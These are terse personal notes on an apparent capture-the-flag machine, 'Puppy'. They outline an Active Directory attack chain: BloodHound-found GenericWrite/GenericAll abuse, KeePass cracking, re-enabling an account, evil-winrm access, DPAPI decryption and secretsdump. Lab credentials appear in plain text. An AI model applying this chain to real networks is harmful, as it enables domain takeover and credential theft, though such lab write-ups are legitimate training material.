HR has GenericWrite over Developers (maybe then can read SMB share?)

Add Levi to Developer group and access /DEV

User

Keepass file we can attempt to open, but needs password

We do not know the pass, need to crack. keepass2john is outdated but can find Keepass4brute

PW = liverpool

Extract passwords + create user & pass list based on relevant Bloodhound accounts

ant.edwards : Antman2025!

Enum this user in Bloodhound to reveals path

dc.puppy.htb → /etc/hosts

GenericAll over Adam.Silver so lets investigate further for writable properties

First lets check Adam.Silver account details

userAccountControl: 66050

Can we activate the account?

We can activate and change password to a known one

Adam.Silver = CanPSRemote → evil-winrm

Cleaner script will deactivate account eventually, may have to reconnect.

Root

Enumerate files

steph.cooper : ChefSteph2025!

Recall there was also a Steph.Cooper_adm account → DPAPI credentials may exist

Manually extract necessary files for offline decryption (need to trim filenames to download in evil-winrm)

Decrypt with impacket dpapi.py

steph.cooper_adm : FivethChipOnItsWay2025!

Can also secretsdump for Admin hash

Graph View

Table of Contents

puppy.htb $\to$ /etc/hosts

We see SMB port open $\to$ check our provided credentials

dc.puppy.htb $\to$ /etc/hosts

Adam.Silver = CanPSRemote $\to$ evil-winrm

Recall there was also a Steph.Cooper_adm account $\to$ DPAPI credentials may exist